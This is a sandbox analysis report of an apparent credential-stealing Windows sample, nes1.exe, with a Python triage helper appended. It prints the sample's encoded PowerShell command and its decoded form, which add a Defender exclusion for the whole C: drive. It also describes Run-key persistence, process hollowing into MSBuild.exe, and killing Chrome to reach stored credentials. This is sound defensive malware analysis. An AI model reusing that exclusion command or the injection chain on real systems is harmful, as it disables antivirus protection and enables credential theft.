Analysis
max time kernel: 4294178s
max time network: 150s
platform: windows7_x64
resource: win7-20220310-en
submitted: 13-03-2022 22:52

Static task: static1
Behavioral task: behavioral1
  Sample: nes1.exe
  Resource: win7-20220310-en (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: nes1.exe
  Resource: win10v2004-en-20220113 (windows10-2004_x64)
  0 signatures, 0 seconds
General
Target: nes1.exe
Size: 75KB
MD5: 147e760e14fcb833dd6dba8aabfbe092
SHA1: 8ae5369a8a95737a8efc4831f5a20ca6b2d959b6
SHA256: 4d4f1d9ac5e7887dda018ea46753789a0c3d8e1199ea3c34502aa8da2136fe0e
SHA512: ebad6c551e11acef22e2952131e68dec9931a31f366d89f9d02ed63b3e479a8e6fa2eaa38b6d4c2885e1714e888124c207a7dbc4c15741f5cb11d8081d1198a5
Score: 10/10
Malware Config
Signatures

- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

- Adds Run key to start application (2 TTPs, 1 IoC)
  Process: nes1.exe
  Operation: Set value (str)
  Key: \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\applicationSU
  Data: "C:\Users\Admin\AppData\Roaming\tmp1\apps\applicationSU.exe"

- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow 10: eth0.me
- Suspicious use of SetThreadContext (1 IoC)
  PID 2016 (nes1.exe) set thread context of PID 2040 (MSBuild.exe)
  Combined with the repeated WriteProcessMemory calls from 2016 into 2040 listed below, and with MSBuild.exe being launched without a project file, this is the usual injection/process-hollowing pattern: a signed Microsoft binary is started suspended, its memory is overwritten, and its entry point is redirected before it runs.

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox flags this as likely ransomware behaviour; it is also common in stealers and legitimate software, so on its own it is weak evidence.
-
- Kills process with taskkill (1 IoC)
  PID 852: taskkill.exe

- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  PID 1100: powershell.exe
  PID 2016: nes1.exe (2 IoCs)
  PID 2040: MSBuild.exe (2 IoCs)

- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege, PID 2016 nes1.exe
  Token: SeDebugPrivilege, PID 1100 powershell.exe
  Token: SeDebugPrivilege, PID 2040 MSBuild.exe
  Token: SeDebugPrivilege, PID 852 taskkill.exe

- Suspicious use of WriteProcessMemory (17 IoCs)
  PID 2016 (nes1.exe) wrote to memory of PID 1100 (powershell.exe): 4 IoCs
  PID 2016 (nes1.exe) wrote to memory of PID 2040 (MSBuild.exe): 9 IoCs
  PID 2040 (MSBuild.exe) wrote to memory of PID 852 (taskkill.exe): 4 IoCs
Processes

1. C:\Users\Admin\AppData\Local\Temp\nes1.exe (PID 2016)
   Command line: "C:\Users\Admin\AppData\Local\Temp\nes1.exe"
   - Adds Run key to start application
   - Suspicious use of SetThreadContext
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1100)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXAB0AG0AcAAxAFwAYQBwAHAAcwBcAGEAcABwAGwAaQBjAGEAdABpAG8AbgBTAFUALgBlAHgAZQAnAA==
      Decoded (-enc takes base64 of a UTF-16LE string):
      Set-MpPreference -ExclusionPath 'C:\','C:\Users\Admin\AppData\Roaming\tmp1\apps\applicationSU.exe'
      This adds a Defender exclusion for the entire C: volume as well as for the binary registered under the Run key above, so the persisted payload is never scanned. The image path is under SysWOW64 although the command line names System32 because the 32-bit sample is subject to WoW64 file system redirection.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

   2. C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 2040)
      Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      Launched with no project file, which is the hollowed host for the injected payload.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\taskkill.exe (PID 852)
         Command line: "taskkill.exe" /im chrome.exe /f
         Forcibly terminating Chrome releases the lock on its profile databases, a common prelude to copying browser credential stores.
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
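As an added triage helper, not part of the sandbox report or of the sample, the following Python decodes the -EncodedCommand argument from the process tree above, flags the Defender exclusions it sets, and correlates the excluded paths with the Run-key persistence entry from the signatures section. The command lines and the Run-key value are copied from this report; the function names, the prefix regex for -EncodedCommand and the scoring fields are my own assumptions.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample input: the command lines from the process tree in the report
# above, parent first. The base64 blob is the one nes1.exe passed to powershell.exe.
SAMPLE_COMMAND_LINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\nes1.exe"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc '
    "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAg"
    "AC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcA"
    "QwA6AFwAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBk"
    "AG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0A"
    "aQBuAGcAXAB0AG0AcAAxAFwAYQBwAHAAcwBcAGEAcABw"
    "AGwAaQBjAGEAdABpAG8AbgBTAFUALgBlAHgAZQAnAA==",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
    r'"taskkill.exe" /im chrome.exe /f',
]

# Constructed from the "Adds Run key" signature above: value name -> value data.
SAMPLE_RUN_KEY_VALUES = {
    "applicationSU": r'"C:\Users\Admin\AppData\Roaming\tmp1\apps\applicationSU.exe"',
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# -ex / -ep (ExecutionPolicy) must not match, so the optional tail is 'c' or 'n...'.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")
# Single-quoted PowerShell string literals such as 'C:\' or 'C:\Users\...'.
_PS_SQ_STRING = re.compile(r"'([^']*)'")
# A drive-root exclusion ('C:\', 'D:') hides the whole volume from Defender.
_DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def defender_tampering(script: str) -> Dict[str, object]:
    """Score a decoded script for Set-/Add-MpPreference exclusion or disable calls."""
    s = script.lower()
    finding: Dict[str, object] = {
        "exclusion_cmdlet": bool(re.search(r"\b(set|add)-mppreference\b", s)),
        "exclusion_paths": [],
        "whole_volume_excluded": False,
        "realtime_disabled": "disablerealtimemonitoring" in s,
    }
    if finding["exclusion_cmdlet"] and "-exclusion" in s:
        paths = _PS_SQ_STRING.findall(script)
        finding["exclusion_paths"] = paths
        finding["whole_volume_excluded"] = any(_DRIVE_ROOT.match(p) for p in paths)
    return finding


def triage(command_lines: List[str]) -> List[Dict[str, object]]:
    """Decode every encoded PowerShell invocation in a process tree and score it."""
    results = []
    for cmd in command_lines:
        script = decode_encoded_command(cmd)
        if script is None:
            continue
        finding = defender_tampering(script)
        finding["decoded"] = script
        results.append(finding)
    return results


def _norm(path: str) -> str:
    return path.strip().strip('"').lower()


def excluded_persisted_binaries(exclusion_paths: List[str],
                                run_key_values: Dict[str, str]) -> List[str]:
    """Run-key entries whose binary sits inside a Defender exclusion (exact or drive-root)."""
    excluded = [_norm(p) for p in exclusion_paths]
    hits = []
    for name, data in run_key_values.items():
        binary = _norm(data)
        if any(binary == e or (_DRIVE_ROOT.match(e) and binary.startswith(e)) for e in excluded):
            hits.append(name)
    return hits


if __name__ == "__main__":
    for f in triage(SAMPLE_COMMAND_LINES):
        print(f["decoded"])
        print("whole volume excluded:", f["whole_volume_excluded"])
        print("persisted and excluded:",
              excluded_persisted_binaries(f["exclusion_paths"], SAMPLE_RUN_KEY_VALUES))
```

On a suspect host the same two facts can be confirmed directly: `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` for the exclusions, and the HKCU ...\CurrentVersion\Run value named applicationSU for the persistence. A drive-root exclusion should be treated as Defender being effectively off for that volume until it is removed.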